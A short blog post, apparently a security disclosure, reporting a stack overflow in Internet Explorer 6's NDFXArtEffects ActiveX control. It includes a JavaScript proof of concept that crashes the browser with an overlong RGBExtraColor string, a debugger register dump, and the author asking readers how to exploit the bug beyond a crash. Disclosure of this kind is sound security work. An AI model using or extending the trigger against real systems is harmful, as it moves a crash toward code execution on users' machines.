The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. stack overflow can occur by setting one of the RGBExtraColor, RGBForeColor, and RGBBackColor properties to a long string value. Since the entire string is placed into a stack buffer, you are able to select exactly what instruction to fault on based on the length of the string. Does anyone know of a way to exploit this for something besides a crash?
var b = 'XXXX';
while(b.length <=1024*1024) b+=b;
var a = new ActiveXObject('DXImageTransform.Microsoft.NDFXArtEffects.1');
var i = 1016320;
a.RGBExtraColor = b.substring(0,i);
Demonstration
eax=4db88a05 ebx=000f8201 ecx=7c809f8a
edx=0013b274 esi=02f50024 edi=00000000
eip=4db88a11 esp=00043000 ebp=0013b254
wmm2fxb!DXColorFromBSTR+0xc8:
4db88a11 57 push edi
This bug will be added to the OSVDB:
Microsoft IE NDFXArtEffects Multiple Property Stack Overflow
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment